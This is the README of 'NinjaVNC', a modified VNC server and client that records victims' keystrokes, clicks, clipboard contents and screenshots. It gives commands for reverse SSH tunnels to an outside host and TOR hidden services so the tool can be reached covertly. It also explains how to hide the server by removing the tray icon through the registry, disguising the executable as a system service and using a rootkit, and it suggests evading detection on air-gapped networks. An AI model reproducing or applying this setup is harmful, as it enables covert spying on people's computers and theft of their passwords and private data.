
# 🥷🥷 [Please sponsor this project by getting the T-shirt](https://www.etsy.com/hk-en/listing/1279876840/ninjavnc-unisex-t-shirt) 🥷🥷



# NinjaVNC - Technical Documentation
Welcome to NinjaVNC! First a big shoutout to TightVNC for releasing the original code base
under the GNU General Public License. NinjaVNC continues the tradition and is also
released under the GNU General Public License so feel free to fork it,
extend it, send pull request back to NinjaVNC and play with it as you see fit. It
is released with the intent to be used as an educational tool. Great power
comes with great responsibility so make sure you use it ethically correct. Karma 
is a bitch!

## Getting started
The easiest way to get started is to setup a server and client locally
on your windows machine. Download and extract the precompiled windows 
server binaries from the latest 
[server artifacts](https://gitlab.com/NinjaVNC/windows/-/pipelines)
and the latest Java client binaries from the 
[client artifacts](https://gitlab.com/NinjaVNC/java/-/pipelines).

Start the server by double clicking the WinVNC.exe executable and you
should see the NinjaVNC icon showing up at the system tray at the 
bottom right of your desktop. You will also likely be asked to set an
admin password which you should do.

The client is based on Java so a prerequisite is to have Java installed.
A verified working version is Java 10.0.2 JRE which you can find
[here](https://www.oracle.com/hk/java/technologies/java-archive-javase10-downloads.html)

Before starting up the client you want to avoid 
[optical video feedback](https://en.wikipedia.org/wiki/Video_feedback) which you can do
by only broadcasting a small part of your desktop from the server. You find the option
to do so by right clicking the tray icon and choosing Properties... | Display and pick
Rectangular area. Resize the area to cover a couple of inches of your top right desktop
and hit OK.

The final step is to fire up the client. You do it best from a command line console using 
the command from within the expanded downloaded zip artifact.
```
java -jar java-1.0.0.jar HOST 127.0.0.1 PORT 5900 PASSWORD Y0urP@55w0rd
```
you should expect to see something along the lines with
``` 
Initializing...                                                      
Connecting to 127.0.0.1, port 5900...                                
Connected to server                                                  
RFB server supports protocol version 3.8                             
Using RFB protocol version 3.8                                       
Enabling TightVNC protocol extensions                                
Performing standard VNC authentication                               
VNC authentication: success                                          
Desktop name is mydesktop                                                  
Desktop size is 100 x 100                                            
Using Tight/ZRLE encodings                                           
```
You should then see a GUI popping up. It would look like the stndard VNC Java client but with 
the added Snooper button. Clicking on the button will show you a window with recorded key presses,
mouse clicks and clip board cut actions.

In addition you would also see a low level recording view in the console window showing the same
actions but optimized to be machine readable. Mouse clicks do also trigger desktop screen capture
dumps which are store in the current directory and named by timestamps.


## Tunnels
In order to connect to your service when it is running on another private network you can either
open a TCP connection to the target machine or let the target machine connect to you through a
tunnel. The former requires exposing your service on the public
internet which rarily is an option since it requires internal routing and opening of firewalls.
The latter option uses reverse tunnels where the service connects to yourself from within the 
private network. Depending on what the network allows through you can use different alternative
tunnels which all come with pros and cons. Most proxy servers allow traffic to hosts with
benign websites over https, some more intrusive ones use
[deep packet inspection](https://en.wikipedia.org/wiki/Deep_packet_inspection) and the most hostile
are the [air gapped](https://en.wikipedia.org/wiki/Air_gap_(networking)) networks. In general the 
more hostile they are the more you have to hide the traffic and the lower the bandwidth. VNC 
transmits graphics and is very network intense so you might want to fork your own version of the
code base with less data transmission if you face hostile environments.

### Reverse SSH tunnel - Performance
Using a reverse SSH tunnel is the most performant option but requires you to provide an SSH
server facing the internet. For testing purposes you can eaily spin up one on an AWS EC2 instance.
If you need to be covert you might not want to use your own. The software you need is an SSH
client supporting the SSH-2 protocol such as 
[Putty](https://www.chiark.greenend.org.uk/~sgtatham/putty/latest.html) or 
[Cygwins](https://www.cygwin.com/) OpenSSH client (OpenSSH_8.8p1, OpenSSL 1.1.1) which both 
works fine while Windows 10 (OpenSSH_for_Windows_8.1p1, LibreSSL 3.0.2) appears to have problems
creating remote tunnels accepting connections from any host on the SSH server machine. The
command you need to execute on the VNC desktop machine is
```
ssh -i key.pem -R 0.0.0.0:4711:localhost:5900 ec2-user@1.2.3.4
```
This will expose port 4711 on the SSH server with ip 1.2.3.4 (open AWS security group port) and 
connect you to port 5900 (VNC port) on the VNC desktop. The key.pem is the private key for SSH
authentication which needs to match your public key you put in ~/.ssh/authorized_keys on the SSH
server. Make sure your private key is only readable by you or SSH will fail to connect.

### STunnel - Only web traffic allowed
If the proxy blocks SSH traffic even to standard 80 and 443 ports you might need to wrap your data
in HTTPS/SSL/TLS which can be done using [STunnel](https://www.stunnel.org)

### TOR tunnel - Stealth
The stealthy way which doesn't require any external server is to use 
[TOR](https://www.torproject.org/). This will protect you from anyone finding out who is connected 
to the desktop but comes with a performance penalty due to the onion routing. You need TOR to be
running on both client and server. You only need the key TOR proxy and not the entire browser bundle.
You can download it from [their old website](https://dist.torproject.org/torbrowser/11.0.4/) where
version tor-win64-0.4.6.9 is known to work.

On the VNC desktop server you need to create a hidden service to connect to using a TOR config file:

torrc.txt:
```
HiddenServiceDir C:\Programs\tor\vnc
HiddenServicePort 5900 127.0.0.1:5900
```
Do not create the HiddenServiceDir directory before starting the server using:
```
tor -f torrc.txt
```
This will create a hostname file inside your HiddenServiceDir containing your .onion address i.e. 
5iaogwge6ij4vecvy49vsubiuctefbzqbx2ccnzmorshkllffmy5kkqd.onion. You can create duplicate 
versions of the lines above if you like to expose different .onion addresses for different users.

On your client side you can run TOR without any config file and it will bind to the default ports.
You can then connect the NinjaVNC client through TOR using the command:
```
java -Djava.net.preferIPv4Stack=true -DsocksProxyHost=127.0.0.1 -DsocksProxyPort=9150 -jar java-1.0.0.jar HOST 5iaogwge6ij4vecvy49vsubiuctefbzqbx2ccnzmorshkllffmy5kkqd.onion PORT 5900 PASSWORD Y0urP@55w0rd
```


### Air gapped tunnels
These require a bit more effort and you typically need to provide your own hardware to carry data
over. There are plenty of options here with exisiting wifi and bluetooth hardware readily available. You
might want to consider buffering and bursting data over different frequencies to avoid detection.
Air gapped systems are beyond the scope of NinjaVNC but have a look at 
[The Thing](https://en.wikipedia.org/wiki/The_Thing_(listening_device)) or the 
[IBM Selectric Bug](https://www.cryptomuseum.com/covert/bugs/selectric/) for inspiration. 


## Docker headless clients
You can also run the client without the GUI as a service in the background using docker. You won't
get the real time GUI and interactivity but it will be easier to run deployed on hosting platforms
such as AWS, GCP, Azure or in your own containerized environment. Key presses, mouse clicks and clipboard
samples will be redirected to the docker output log. 

### Simple client
To connect to a local or remote ssh tunnelled server using docker do
```
# In this example the remote server has the IP address 192.168.0.110. If you running locally you would
# likely want to use the external IP address such as 192.168.0.110 instead of 127.0.0.1
docker run -it ninjavnc/simple HOST 192.168.0.110 PORT 5900 PASSWORD Y0urP@55w0rd
```

### TOR client
To connect using TOR you would follow the same pattern as above but you would not need to worry about
running your stand alone TOR proxy since it is included inside the docker container. Fire it up by doing
```
docker run -it ninjavnc/tor HOST 5iaogwge6ij4vecvy49vsubiuctefbzqbx2ccnzmorshkllffmy5kkqd.onion PORT 5900 PASSWORD Y0urP@55w0rd
```

## NinjaVNC Protocol Extensions
NinjaVNC extends the original RFB prtocol, [RFC 6143](https://datatracker.ietf.org/doc/html/rfc6143), 
as outlined in [RFC 6143 - RFB Ninja VNC Extensions](https://vnc.ninja/rfc6143-ninjavnc-extensions.html).

## Practical runtime considerations

### Hiding from the desktop
TOR and VNC can be run as system services. The tray icon can be removed by setting the registry DWORD of the 
following key to 1:
```
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\ORL\WinVNC3
```
This still means that they are visible in the process list. The easy way to hide is simply to name the 
executable similar to existing services and change icons to innocent looking icons. The more 
sophisticated way is to install a rootkit to properly hide the process but this is beyond the scope of
the current document.

# 🥷🥷 [Please sponsor this project by getting the T-shirt](https://www.etsy.com/hk-en/listing/1279876840/ninjavnc-unisex-t-shirt) 🥷🥷